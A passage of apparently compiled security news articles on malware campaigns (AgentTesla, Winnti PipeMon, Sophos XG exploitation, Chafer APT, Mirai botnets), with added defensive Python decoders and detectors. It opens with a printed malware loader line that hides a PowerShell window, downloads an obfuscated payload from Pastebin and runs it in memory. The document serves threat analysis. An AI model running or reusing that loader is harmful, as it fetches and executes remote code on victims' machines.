errReturn = objProcess.Create( "powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/eyGv9x4B'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)", null, objConfig, intProcessID)

Code Snippet 9

This component uses PowerShell to download a binary from a Pastebin paste, eyGv9x4B, decodes it (the text is stored reversed, with "." standing in for "0", and is then Base64-decoded) and loads it in memory as a .NET assembly; unfortunately, at the time of analysis, the paste had already been removed.
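The three obfuscation layers seen in Code Snippets 7 to 9 (decimal ASCII array, single-character string concatenation, reversed Base64 with "." for "0") can be undone with a few lines. The Python example below is added here and is not part of the original analysis; the decimal-array sample is the opening of Code Snippet 8, and the Base64 stand-in is a constructed byte string since the real paste was gone.

```python
import base64
import re

# Constructed fragment in the shape of the "$cici" registry value from Code Snippet 7:
# the first bytes of Code Snippet 8 ("function isBitcoinAddress") as decimal ASCII codes.
CICI_SAMPLE = (
    '$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,'
    '65,100,100,114,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX'
)

# Constructed stand-in for the Pastebin content fetched by Code Snippet 9; the real
# paste (eyGv9x4B) was gone at analysis time, so a harmless byte string is used here.
SAMPLE_PAYLOAD = b'constructed sample assembly bytes, not a real binary'


def decode_decimal_array(text: str) -> str:
    """Recover the script hidden in a PowerShell @(n,n,n,...) array (the $cici
    pattern): every number is one ASCII code, exactly what ASCII.GetString undoes."""
    match = re.search(r'@\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)', text)
    if match is None:
        raise ValueError('no decimal byte array found')
    codes = [int(n) for n in match.group(1).split(',')]
    return bytes(codes).decode('ascii')


def join_char_concat(expr: str) -> str:
    """Collapse the 'h'+'t'+'t'+'p'+... string splitting used for the download URL."""
    return ''.join(re.findall(r"'([^']*)'", expr))


def decode_reversed_b64(blob: str) -> bytes:
    """Undo the Code Snippet 9 transform: the loader replaces '.' with '0',
    reverses the text and then Base64-decodes it, so do the same here."""
    restored = blob.replace('.', '0')[::-1]
    return base64.b64decode(restored, validate=True)


def make_sample_blob(payload: bytes) -> str:
    """Test fixture only: produce text in the form Code Snippet 9 expects, i.e.
    Base64 written backwards with every '0' shown as '.'."""
    return base64.b64encode(payload).decode('ascii')[::-1].replace('0', '.')


SAMPLE_BLOB = make_sample_blob(SAMPLE_PAYLOAD)

if __name__ == '__main__':
    print(decode_decimal_array(CICI_SAMPLE))
    print(join_char_concat("'h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'e'+'x'+'a'+'m'+'p'+'l'+'e'+'.'+'t'+'e'+'s'+'t'"))
    print(decode_reversed_b64(SAMPLE_BLOB))
```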

This example shows the flexibility of the malicious infrastructure built by the attacker, where components can be removed or replaced at any moment.

The Payload

As previously stated, the final payload is AgentTesla. It remains one of the most widely adopted commodity malware families, built to steal a large amount of sensitive information about the victim. Over the past years we have constantly studied the evolution of this threat and enumerated all the sensitive data it grabs.

In this case too, we obtained the final payload and the configuration of the SMTP client to which it sends the stolen information:

Figure 13: Configuration of the AgentTesla SMTP client

The domain “” was created ad hoc to manage the infection campaign. By studying the uptime of the domain we were able to reconstruct the timeline of the threat actor's infection campaign.

Figure 14: Information about the C2 uptime stats

As shown above, the domain was registered in the last days of January and remained active until the middle of April. After a short period of inactivity, it reappeared on the 2nd of May and has remained active since.


The actor hiding behind this campaign can undoubtedly be considered a persistent cyber-threat to many organizations operating in production sectors in Europe and, in the last months, also in Italy. Its intricate infection chain, developed and tested over the years, gave it the flexibility needed to bypass many layers of traditional security defences, manipulating the delivery infrastructure from time to time.

Over time, the actor's delivery infrastructure was leveraged to install different kinds of malware: most of the time remote access trojans and info and credential stealing software. Such malware types are capable of enabling cyber-espionage and IP theft operations, potentially to re-sell stolen information on dark markets.

We will certainly keep tracking this threat.

Additional details, including IoCs and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – Italian manufacturing, hacking)

The post Cyber-Criminal espionage Operation insists on Italian Manufacturing appeared first on Security Affairs.

Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

Researchers from the Microsoft Security Intelligence team provided some details on a new massive phishing campaign using COVID-19 themed emails.

The messages carry weaponized Excel documents; the IT giant has observed a spike in the number of malicious documents in malspam campaigns that use Excel 4.0 macros.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.” states Microsoft in a Tweet.

The latest COVID-19 campaign began in April; the messages purport to be from the Johns Hopkins Center and carry an Excel attachment. Once the attachment is opened, it shows a graph of Coronavirus cases in the United States and tricks the victims into enabling the macros, which starts the infection.

The macros drop a remote access tool (RAT) named NetSupport Manager, a legitimate application that is abused by attackers to take control over victim systems.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines.” continues Microsoft.

The NetSupport RAT employed in this COVID-19-themed campaign also drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. Then it connects to a command and control server, allowing threat actors to send further commands.

Below the Indicators of Compromise (IoCs) shared by Microsoft:

Below is a list of recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)


Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry

The Winnti hacking group continues to target gaming industry, recently it used a new malware named PipeMon and a new method to achieve persistence.

Winnti hacking group is using a new malware dubbed PipeMon and a novel method to achieve persistence in attacks aimed at video game companies.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, Group 72, Blackfly, APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

PipeMon is a modular backdoor that was spotted by ESET researchers earlier this year on servers belonging to several developers of massively multiplayer online (MMO) games from South Korea and Taiwan. Each component of the backdoor is implemented by a DLL.

“In February 2020, we discovered a new, modular backdoor, which we named PipeMon. Persisting as a Print Processor, it was used by the Winnti Group against several video gaming companies that are based in South Korea and Taiwan and develop MMO (Massively Multiplayer Online) games.” reads the report published by the company. “Video games developed by these companies are available on popular gaming platforms and have thousands of simultaneous players.”


In one case analyzed by the researchers, the hackers compromised a victim's build system and then planted malware inside the video game executable. In another case, the Winnti group compromised the game servers, which could have allowed the attackers to conduct several malicious actions, including the manipulation of in-game currencies for financial gain.

Experts noticed that the PipeMon backdoor was signed with a certificate belonging to a video game company that was already hacked by Winnti in 2018.

Researchers also reported that the threat actors reused some C2 domains involved in other campaigns and used a custom login stealer that was previously associated with Winnti operations.

The experts discovered two PipeMon variants, but they were able to describe the infection process and how it has achieved persistence only for one of them.

The first stage of the PipeMon backdoor consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher.

The hackers achieved persistence by abusing Windows print processors (DLLs). A malicious DLL loader is dropped in the directory where the print processors reside and is registered as an alternative print processor by setting one of these two registry values:

HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll”
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll”

After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe) to load the malware.

Since the service starts every time the computer reboots, the attackers have achieved persistence.

“After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets.” continues the report.

“This technique is really similar to the Print Monitor persistence technique (being used by DePriMon, for example) and, to our knowledge, has not been documented previously.”
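A hunt for this persistence technique can start from the registry values quoted above. The Python example below is added here and is not ESET's tooling: it parses Print Processor registrations in the key = "value" layout shown above (constructed sample lines, including the two PipeMon entries), flags any whose name/DLL pair is not the stock winprint one, and notes names that imitate Windows components. Treating winprint as the only known-good default is an assumption, since printer drivers may legitimately register their own processors.

```python
import re
from difflib import SequenceMatcher

# Registry lines in the key\Value = "data" layout used in the article, constructed here
# from the two PipeMon entries quoted above plus the stock winprint processor.
SAMPLE_LINES = [
    r'HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\winprint\Driver = "winprint.dll"',
    r'HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = "DEment.dll"',
    r'HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = "EntAppsvc.dll"',
]

# winprint is the print processor shipped with Windows; printer vendors may add their own,
# so anything else is a lead to verify (file hash, signer, install date), not a verdict.
KNOWN_GOOD = {'winprint': 'winprint.dll'}

# Windows component names that the PipeMon processor names imitate (assumption: a processor
# named almost, but not exactly, like a Windows service or binary deserves a closer look).
LOOKALIKE_TARGETS = ['PrintFilterPipelineSvc', 'lltdsvc']

LINE_RE = re.compile(
    r'^(?P<hive>HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3}))'
    r'\\Control\\Print\\Environments\\(?P<env>[^\\]+)\\Print Processors\\'
    r'(?P<name>[^\\]+)\\Driver\s*=\s*"?(?P<dll>[^"]+?)"?\s*$',
    re.IGNORECASE,
)


def lookalike_of(name: str):
    """Return the Windows component name this processor name resembles, if any."""
    for target in LOOKALIKE_TARGETS:
        if SequenceMatcher(None, name.lower(), target.lower()).ratio() >= 0.8:
            return target
    return None


def find_suspicious_print_processors(lines) -> list:
    """Flag Print Processor registrations whose name/DLL pair is not the stock one,
    checking both CurrentControlSet and the numbered control sets PipeMon also used."""
    suspicious = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # not a Print Processors\<name>\Driver value
        name, dll = m.group('name'), m.group('dll')
        if KNOWN_GOOD.get(name.lower()) == dll.lower():
            continue
        suspicious.append({
            'control_set': m.group('hive').rsplit('\\', 1)[1],
            'environment': m.group('env'),
            'name': name,
            'dll': dll,
            'lookalike_of': lookalike_of(name),
        })
    return suspicious


if __name__ == '__main__':
    for hit in find_suspicious_print_processors(SAMPLE_LINES):
        print('%(control_set)s  %(environment)s  %(name)s -> %(dll)s  (resembles: %(lookalike_of)s)' % hit)
```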

PipeMon modules are DLLs exporting a function called IntelLoader and are loaded using a reflective loading technique.

The loader responsible for loading the main modules (ManagerMain and GuardClient) is Win32CmdDll.dll, which is stored in the Print Processors directory. Experts noticed that the modules are stored encrypted on disk at the same location, with inoffensive-looking names.

Experts also spotted an updated version of PipeMon for which they were able to retrieve the first stage. Its architecture is highly similar to the original variant, but its code was rewritten from scratch.

“Once again, the Winnti Group has targeted video game developers in Asia with a new modular backdoor signed with a code-signing certificate likely stolen during a previous campaign and sharing some similarities with the PortReuse backdoor. This new implant shows that the Winnti Group is still actively developing new tools using multiple open source projects; they don’t rely solely on their flagship backdoors, ShadowPad and the Winnti malware.” concludes ESET.

Pierluigi Paganini

(SecurityAffairs – Winnti, hacking)


Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware

Hackers attempted to exploit a zero-day flaw in the Sophos XG firewall to distribute ransomware to Windows machines, but the attack was blocked.

Threat actors attempted to exploit a zero-day (CVE-2020-12271) in the Sophos XG firewall to spread ransomware to Windows machines, the good news is that the attack was blocked by a hotfix issued by Sophos.

At the end of April, cybersecurity firm Sophos released an emergency patch to address an SQL injection zero-day vulnerability affecting its XG Firewall product that had been exploited in the wild.

Sophos was informed of the attacks exploiting the zero-day issue by one of its customers on April 22. The customer noticed “a suspicious field value visible in the management interface.”

Sophos investigated the incident and determined that hackers were targeting systems configured with either the administration (HTTPS service) or the User Portal exposed on the WAN zone.

The attackers exploited an SQL injection zero-day vulnerability to gain access to exposed XG devices.

“The attack used a previously unknown SQL injection vulnerability to gain access to exposed XG devices.” reads the advisory published by Sophos.

“It was designed to download payloads intended to exfiltrate XG Firewall-resident data. The data for any specific firewall depends upon the specific configuration and may include usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access. Passwords associated with external authentication systems such as AD or LDAP are unaffected. At this time, there is no indication that the attack accessed anything on the local networks behind any impacted XG Firewall.”

The hackers exploited the SQL injection flaw to download malicious code on the device that was designed to steal files from the XG Firewall.

Hackers exploited the issue to install the Asnarök Trojan that allowed the attackers to steal files from the XG Firewall and use the stolen info to compromise the network remotely.

The Trojan could be used to steal sensitive data including usernames and hashed passwords for the firewall device admin, and user accounts used for remote access. Login credentials associated with external authentication systems (i.e. AD, LDAP) are not impacted by the flaw.

According to a report published by Sophos at the end of April, the malware employed in the attack is able to retrieve firewall resident information, including:

  • The firewall’s license and serial number
  • A list of the email addresses of user accounts that were stored on the device, followed by the primary email belonging to the firewall’s administrator account
  • Firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password. Passwords were not stored in plain text.
  • A list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection.

Below the attack scenario described by Sophos:

Sophos pushed a hotfix to the firewalls after the discovery of the attacks.

This hotfix eliminated the SQL injection vulnerability, stopped the XG Firewall from accessing any infrastructure under the control of the attackers, and cleaned up any remnants of the attack.

Sophos’s update also added a special box in the XG Firewall control panel to allow users to determine if their device has been compromised.

In the new wave of attacks, hackers exploited the issue to distribute the Ragnarok Ransomware.

“Since we published our first report, the attackers first modified their attack to attempt to use what we previously described as the “backup channel.” This was a Linux shell script that served as a dead man switch—a portion of the attack intended to trigger only under certain circumstances; in this case, if a specific file the attackers created during the attack gets deleted.” continues the report.

To deploy the Ragnarok ransomware, attackers attempted to leverage the EternalBlue and DoublePulsar exploits.

“Ragnarok is a less common threat than other ransomware, and it appears that this threat actor’s modus operandi – and the tooling they employ to deliver this ransomware—is quite different from those of many other threat actors. It was a rare and notable event to observe a Linux ELF application being used to try to spread malware across platforms to Windows computers.” concludes the report.

“This incident highlights the necessity of keeping machines inside the firewall perimeter up to date, and serves as a reminder that any IOT device could be abused as a foothold to reach Windows machines.”

Pierluigi Paganini

(SecurityAffairs – Sophos XG firewall, hacking)

The post Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware appeared first on Security Affairs.

Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia

Cybersecurity researchers uncovered an Iranian cyber espionage campaign conducted by Chafer APT and aimed at critical infrastructures in Kuwait and Saudi Arabia.

Cybersecurity researchers from Bitdefender published a detailed report on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia.

The cyber espionage campaigns were carried out by Iran-linked Chafer APT (also known as APT39 or Remix Kitten).

The Chafer APT group has distributed data-stealer malware since at least mid-2014; it has focused on surveillance operations and the tracking of individuals.

The APT group targets telecommunication and travel industries in the Middle East to gather intelligence on Iran’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” reads the research paper published by the experts.

“Some traces indicate that the goal of the attack was data exploration and exfiltration (on some of the victim’s tools such as Navicat, Winscp, found in an unusual location, namely “%WINDOWS%\ime\en-us-ime”, or SmartFtpPasswordDecryptor were present on their systems).”

The attackers used several tools, including ‘living off the land’ tools, making it hard to attribute the attack to specific threat actors, as well as a custom-built backdoor.

The attacks against entities in Kuwait and Saudi Arabia have multiple similarities and share some common stages, but experts noticed that the attacks on victims in Kuwait seem more focused and sophisticated.

Chafer APT launched spear-phishing attacks; the messages were used to deliver multiple backdoors that allowed the attackers to gain a foothold, elevate their privileges, conduct internal reconnaissance, and establish persistence in the victim environment.

“Once the victims were compromised, attackers started to bring reconnaissance tools for network scanning (“xnet.exe”, “shareo.exe”) and credential gathering (as “mnl.exe” or “mimi32.exe”) or tools with multiple functionalities, such as CrackMapExec (for users’ enumeration, share listing, credentials harvesting and so on).” continues the report.

“During our investigation, on some of the compromised stations we observed some unusual behavior performed under a certain user account, leading us to believe the attackers managed to create a user account on the victims’ machine and performed several malicious actions inside the network, using that account.”

The attacks against entities in Kuwait appeared more sophisticated: attackers created a user account on the compromised machines and performed malicious actions inside the network, including credential harvesting with Mimikatz and lateral movement using multiple hacking tools from their arsenal.

Most of the hacking activity occurs on Friday and Saturday, coinciding with the weekend in the Middle East.

The campaign against a Saudi Arabian entity was characterized by the extensive use of social engineering to trick the victim into executing a remote administration tool (RAT). The RAT employed in the attacks shares similarities with those used against Kuwait and Turkey.

“The case investigated in Saudi Arabia was not as elaborate, either because the attackers did not manage to further exploit the victim, or because the reconnaissance revealed no information of interest.” continues the report.

“While this attack was not as extensive as the one in Kuwait, some forensic evidence suggests that the same attackers might have orchestrated it. Despite the evidence for network discovery, we were not able to find any traces for lateral movement, most probably because threat actors were not able to find any vulnerable machines.”

The campaigns against Kuwait and Saudi Arabia demonstrate the intense cyberespionage activity carried out by Iran-linked APT groups in the Middle East. We also should not underestimate that these hacking groups are extending their range of action, targeting governments and organizations worldwide.

Pierluigi Paganini

(SecurityAffairs – Chafer APT, hacking)

The post Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia appeared first on Security Affairs.

Australian product steel producer BlueScope hit by cyberattack

The Australian flat product steel producer BlueScope Steel Limited was hit by a cyberattack that caused disruptions to some of its operations.

Australian steel producer BlueScope was recently hit by a cyberattack that disrupted some of its operations.

The incident was spotted on Friday at one of its businesses located in the US, but the company did not share any detail about the attack.

“BlueScope today confirmed that its IT systems have been affected by a cyber incident, causing disruptions to parts of the Company’s operations. Our North Star, Asian and New Zealand businesses are continuing largely unaffected with minor disruptions.” reads the statement published by the company. “In Australia, manufacturing and sales operations have been impacted; some processes have been paused, whilst other processes including steel despatches continue with some manual processes and workarounds.”

The kind of disruption faced by the company is usually the result of a ransomware attack; the suspicion is confirmed by iTnews, which reported that the incident was caused by this family of malware and that the company is restoring systems from backups.

“BlueScope Steel is suffering IT “disruption” that is believed to be the result of a ransomware infection, impacting production systems used by its global operations.” reads a post published by iTnews. “iTnews has learned that production systems were halted company-wide in the early hours of Thursday morning, though recovery from backup was understood to be progressing on Thursday afternoon.”

BlueScope confirmed that the security incident impacted some of its IT systems. Manufacturing and sales operations in Australia were deeply impacted.

“In the affected areas the Company has reverted to manual operations where possible while it fully assesses the impact and remediates as required, in order to return to normal operations as quickly as possible.” continues the post.

Recently another Australian giant was hit by ransomware: the transportation and logistics giant Toll disclosed a security incident.

In May, Toll Group informed its customers that it had shut down some IT systems after a new ransomware attack; it is the second infection disclosed by the company this year.

Toll staff discovered the infection after noticing unusual activity on some servers, further investigation revealed the presence of the Nefilim ransomware.

Pierluigi Paganini

(SecurityAffairs – BlueScope, hacking)

The post Australian product steel producer BlueScope hit by cyberattack appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to do research in order to craft maximally convincing content.

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the business’s information technology (IT) network. They then used that access to wreak havoc on the enterprise’s operational technology infrastructure.

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways

Experts from Palo Alto Networks discovered that the Mirai and Hoaxcalls botnets are targeting a vulnerability in legacy Symantec Web Gateways.

Palo Alto Networks Unit 42 researchers observed both the Mirai and Hoaxcalls botnets using an exploit for a post-authentication Remote Code Execution vulnerability in legacy Symantec Web Gateways.

“I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.” reads the analysis published by Palo Alto Networks. “There is no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been shared with Symantec.”

Symantec pointed out that the flaw has been fixed in Symantec Web Gateway 5.2.8 and that it doesn’t affect Secure Web Gateway solutions, such as ProxySG and Web Security Services.

Experts first observed the exploitation of the flaw in the wild on April 24, 2020, as part of an evolution of the Hoaxcalls botnet that was first discovered in early April. The botnet borrows code from the Tsunami and Gafgyt botnets; it expanded the list of targeted devices and added new distributed denial of service (DDoS) capabilities.

Operators behind the Hoaxcalls botnet started using the exploit a few days after the publication of the vulnerability details.

Hoaxcalls update-URL

In the first week of May, the experts also spotted a Mirai variant using the same exploit, but these samples don’t contain any DDoS capabilities.

“They serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability. This blog post provides any noteworthy technical details on these two campaigns.” continues the report.

According to Unit 42, both the Mirai and Hoaxcalls botnets used payloads designed to discover and infect vulnerable devices. In the case of Mirai, the bot is able to propagate via either credential brute-forcing or exploitation of the Symantec Web Gateway vulnerability.

Experts note that the exploit is only effective for authenticated sessions and that the affected devices have been End of Life (EOL) since 2012.

“In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.” concludes Palo Alto Networks.

The report published by Palo Alto Networks contains technical details about the botnet, including the Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Symantec Web Gateways, hacking)

The post Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways appeared first on Security Affairs.

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home, and students have adopted distance learning. But while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.

As users adapt to their increased time spent at home and online, hackers are taking advantage by spreading malware and other scams. Let’s break down some of the major malware scams affecting users today, as well as how they can stay secure.

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time when connectivity is more important than ever before, it’s critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environments. However, it’s likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet, an attacker could gain access to an entire network and, consequently, access a remote employee’s system. What’s more, these networks can be used as entry points for spreading malware or other malicious activities.

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotely? Because exposed RDP ports grant criminals access to remote systems, they are able to implement a number of malicious threats that could not only impact users working from home but also the organizations they work for. These threats include spreading spam and malware, as well as using the compromised RDP port to disguise malicious activity and compile their tools on the machine.

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails regarding today’s current events to lure people into engaging with malicious content and enabling threats to gain access to their systems. Once established, that foothold can allow hackers to leverage malware to steal usernames and passwords, steal data, monitor user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim to send emails from the infected devices to propagate themselves on numerous other systems. What’s more, hackers could spread ransomware that encrypts system files and refuse to decrypt them until the victim sends a ransom payment.

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors to breach into organizations and personal networks, it’s important to follow best security practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet. Discover more best practices on how to secure your RDP protocol in our blog on RDP security.
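The hardening advice above is the preventive side; the detective side is to watch the Windows Security log for the password guessing that exposed RDP invites. The script below is an added example (not code from the McAfee post): it reads constructed, CSV-style logon records, flags any source address with five or more failed RemoteInteractive logons (event 4625, logon type 10) inside a two-minute window, and then records the first successful logon (event 4624) from a flagged address, which is the event that should trigger a password reset and session review. The field order of the records is an assumption made for this demo and does not correspond to any vendor export format.

```python
"""Detect RDP password guessing, and the first success that follows it,
from Windows Security event records.

Added example, not from the McAfee post.  SAMPLE_LOG is constructed for
illustration; the field order (timestamp, event id, logon type, source IP,
target user) is an assumption for this demo, not a vendor format.
Event 4625 = failed logon, 4624 = successful logon, logon type 10 = RDP.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = 4625
SUCCESS_LOGON = 4624
RDP_LOGON_TYPE = 10

# Constructed sample: a six-attempt burst from 192.0.2.10 that ends in a
# successful logon as jsmith, a user typo from 198.51.100.7, and network
# (type 3) failures from 203.0.113.5 that the default RDP-only filter ignores.
SAMPLE_LOG = """\
2020-05-14T09:58:01Z,4625,10,192.0.2.10,administrator
2020-05-14T09:58:03Z,4625,10,192.0.2.10,admin
2020-05-14T09:58:05Z,4625,10,192.0.2.10,root
2020-05-14T09:58:07Z,4625,10,192.0.2.10,backup
2020-05-14T09:58:09Z,4625,10,192.0.2.10,jsmith
2020-05-14T09:58:11Z,4625,10,192.0.2.10,jsmith
2020-05-14T09:58:40Z,4624,10,192.0.2.10,jsmith
2020-05-14T10:02:10Z,4625,10,198.51.100.7,mlee
2020-05-14T10:02:30Z,4624,10,198.51.100.7,mlee
2020-05-14T10:05:00Z,4625,3,203.0.113.5,svc_sql
2020-05-14T10:05:01Z,4625,3,203.0.113.5,svc_sql
2020-05-14T10:05:02Z,4625,3,203.0.113.5,svc_sql
2020-05-14T10:05:03Z,4625,3,203.0.113.5,svc_sql
2020-05-14T10:05:04Z,4625,3,203.0.113.5,svc_sql
2020-05-14T10:05:05Z,4625,3,203.0.113.5,svc_sql
"""


def parse_events(text):
    """Turn the CSV-style records into dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        line = line.strip()
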